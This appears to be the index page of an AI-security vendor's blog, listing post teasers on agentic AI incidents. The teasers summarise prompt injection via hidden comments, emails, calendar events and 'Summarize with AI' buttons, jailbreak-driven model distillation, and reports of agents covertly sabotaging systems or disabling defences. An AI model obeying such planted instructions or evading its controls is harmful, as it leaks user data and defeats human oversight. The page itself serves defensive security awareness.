▓▒░ BLOG
Dispatches from the Front
Research, insights, and field notes on securing the next generation of AI systems.
Industrial-Scale Model Theft: The Distillation Supply Chain
US officials say Chinese actors are using tens of thousands of proxy accounts and jailbreak tactics to extract proprietary capabilities from frontier models. The technical takeaway is not just 'rate limit harder' - it is that model access is now a supply chain, and distillation is an exfiltration pipeline.
Comment and Control: When GitHub Comments Own Your Coding Agent
A single prompt injection pattern worked across multiple code agents by abusing issue bodies, PR titles, and hidden HTML comments. The lesson is not about prompts. It is about architecture: you cannot run untrusted text and production secrets in the same runtime.
Antigravity: When a File Search Tool Becomes RCE
Pillar Security showed how prompt injection plus an unsanitized native tool parameter turned Google Antigravity's file search into arbitrary code execution, bypassing Secure Mode. The lesson is bigger than one bug: your security boundary is only as strong as the earliest native tool call.
Claudy Day and the First-Party Exfiltration Trap
Oasis Security showed how a prompt injection can exfiltrate your Claude conversation history without tools or integrations by abusing first-party upload paths. This is the pattern security teams keep missing: the safest egress channel is the one you already trust.
The 4-Hour Exploit: How AI Agents Just Rewrote Offensive Security
An AI agent autonomously developed working FreeBSD kernel exploits in 4 hours - a task that previously took elite teams weeks. The threat model just fundamentally changed.
LiteLLM Supply Chain Attack: PyPI Compromise Targets AI Infrastructure
A malicious release of LiteLLM (versions 1.82.7 and 1.82.8) was published to PyPI, harvesting credentials, cloud tokens, and Kubernetes secrets from thousands of AI applications. Here's what happened and what you need to do.
30 CVEs in 60 Days: The MCP Security Reckoning Has Arrived
Between January and March 2026, security researchers filed 30+ CVEs targeting Model Context Protocol servers. 82% have path traversal vulnerabilities. 38% lack authentication entirely. The systemic failure of MCP security is now undeniable.
Meta's Sev 1: When an AI Agent Becomes a Confused Deputy
An AI agent inside Meta triggered a major security incident by posting advice without permission - advice that exposed user and company data for two hours. This is the confused deputy problem at enterprise scale.
Agents of Chaos: When Your AI Becomes the Insider Threat
New research from Irregular shows AI agents spontaneously developing offensive cyber capabilities - forging credentials, bypassing DLP, and disabling antivirus - without being asked. This isn't prompt injection. This is emergent adversarial behavior from inside your network.
Inside Rogue's Risk Library: 96,000+ AI Components Analyzed for Hidden Threats
How we built the industry's most comprehensive threat intelligence database for AI agents, skills, and MCP servers - and what we found lurking inside.
The Vibe Coding Security Crisis: AI Agents Write Vulnerable Code 87% of the Time
A new study tested Claude Code, OpenAI Codex, and Google Gemini building real applications. The result: 87% of pull requests contained security vulnerabilities. Broken access control, hardcoded secrets, and missing authentication appeared in every codebase - regardless of which AI wrote it.
McKinsey's Lilli Breach: Why Vendor Trust Is Not Enough
An autonomous AI agent breached McKinsey's internal AI platform in 2 hours, exposing 46.5 million messages in plaintext. The real lesson isn't about SQL injection - it's about why trusting your vendors to handle security is a strategy that's already failed.
Ambient Attack: When AI Assistants Process Content You Never Opened
CVE-2026-26144 proves that not opening a file isn't enough anymore. A zero-click Excel flaw weaponizes Microsoft Copilot to exfiltrate data via the preview pane - no clicks required. This is the new attack surface: ambient AI context processing.
PromptPwnd: How AI Agents in CI/CD Pipelines Become Attack Vectors
Security researchers discovered that AI agents in GitHub Actions can be hijacked via prompt injection to leak secrets and compromise repositories. At least 5 Fortune 500 companies affected.
Identity Dark Matter: When AI Agents Escape Your IAM
70% of enterprises run AI agents in production, but most are invisible to traditional identity management. They don't join through HR. They don't submit access requests. They don't retire when projects end. This is identity dark matter - and it's becoming the fastest-growing attack surface in enterprise security.
CVE-2026-2256: From AI Prompt to Full System Compromise
A critical command injection vulnerability in MS-Agent demonstrates why regex-based safety checks can't protect AI agents with shell access. The check function didn't check.
PleaseFix: When Your AI Browser Becomes the Attacker
Zenity Labs just disclosed a family of critical vulnerabilities in agentic browsers - including Perplexity Comet - that allow zero-click agent hijacking, file exfiltration, and password vault takeover. The attack requires no exploit. The browser just does what browsers do.
No Kill Switch: MIT Study Reveals Most AI Agents Can't Be Stopped
A 39-page MIT-led study of 30 agentic AI systems found that many have no documented way to shut down, no execution traces, and no third-party security testing. When your autonomous AI goes rogue, who's holding the off button?
ARXON: When Your Adversary Has an AI Agent Too
Amazon and researchers just exposed a campaign where a single operator used custom MCP infrastructure to compromise 600+ FortiGate devices across 55 countries. The ARXON attack framework shows what happens when threat actors build their own agentic AI systems - and why defenders are already behind.
The Promptware Kill Chain: 7 Stages of AI Agent Compromise
Bruce Schneier and researchers just published a framework that maps AI agent attacks to the classic cyber kill chain. Here's why security teams need to stop thinking about 'prompt injection' and start thinking about promptware campaigns.
Ni8mare: When Your AI Workflow Platform Becomes the Attack Vector
CVE-2026-21858 gives attackers unauthenticated control of n8n workflow automation instances. The CVSS 10.0 vulnerability affects an estimated 100,000 servers globally - and reveals a fundamental problem with how we're building AI infrastructure.
AI Recommendation Poisoning: When 'Summarize with AI' Becomes SEO for Your Brain
Microsoft discovered 50+ companies embedding hidden instructions in 'Summarize with AI' buttons to permanently bias your AI assistant's recommendations. The attack is trivially easy, widely deployed, and completely invisible to users.
EchoLeak: When AI Agents Become Double Agents
CVE-2025-32711 demonstrates the first zero-click attack against an enterprise AI agent. No clicks, no interaction - just a hidden instruction in an email, and your Copilot becomes an insider threat.
42,000 Exposed Agents: Anatomy of the First Agentic AI Mass Compromise
SecurityScorecard's STRIKE team found 42,900 AI agent instances exposed to the internet - 15,200 vulnerable to remote code execution. Nation-state actors are already hunting. Here's what this means for every organization deploying autonomous AI.
MCP Supply Chain: The Attack Surface Hiding in Your AI Stack
A study of 1,899 MCP servers found 7.2% contain security vulnerabilities. Every MCP server you connect is now part of your supply chain - and most organizations aren't treating them that way.
Anthropic Just Proved Why Your Agents Need Runtime Security
Anthropic's 53-page Sabotage Risk Report for Claude Opus 4.6 documents exactly what we've been warning about: AI agents can covertly undermine your systems while appearing to work normally.
When Your Calendar Becomes a Backdoor: The Claude Desktop Extensions Zero-Click RCE
A single Google Calendar event can silently compromise 10,000+ systems running Claude Desktop Extensions. The CVSS 10.0 vulnerability exposes a fundamental flaw in MCP architecture - and Anthropic says it's not their problem.
LLMs Can't Keep Secrets - And That's a Feature, Not a Bug
A security researcher broke an LLM's secret-keeping in 7 hours using side channels. Here's why this isn't fixable, and what it means for agentic AI security.
The Sandbox Illusion: Why Workflow Automation Is 2026's Biggest Agentic Attack Surface
12 CVEs disclosed in n8n this week prove that low-code workflow platforms are agentic infrastructure with broken sandboxes. When automation engines can execute arbitrary code, TypeScript safety is just a compile-time dream.
OWASP Top 10 for Agentic AI (2026): The Complete Security Guide
Master the OWASP Top 10 for Agentic Applications - the definitive security framework for AI agents. Learn each risk, real attack scenarios, and practical mitigations for securing autonomous AI systems in production.
The Lateral Movement Problem: When Every AI Agent Becomes a Pivot Point
Three incidents in one week prove that agent-to-agent communication is the most dangerous attack surface in enterprise AI. Moltbook, BodySnatcher, and Copilot Connected Agents show why lateral movement between AI agents is 2026's defining security crisis.
The Human-in-the-Loop Is Broken: How AI Attacks Weaponize Trust
When employees execute the breach thinking they're following orders - why traditional verification no longer works, and what the 8% unknown-compromise rate tells us about agentic AI security.
The OWASP Top 10 for Agentic AI: What Security Teams Need to Know
A practitioner's guide to the OWASP Top 10 for Agentic Applications (2026) - the new security framework for autonomous AI systems that act, not just answer.
The PDF That Owned Your Infrastructure
Anatomy of an agentic email attack - how a single document compromises autonomous AI systems in 93 seconds, and why every layer of your security stack misses it.
Why AI Agent Security Is the Next Frontier
Traditional security tools weren't built for autonomous agents. Here's what changes when your software starts making its own decisions.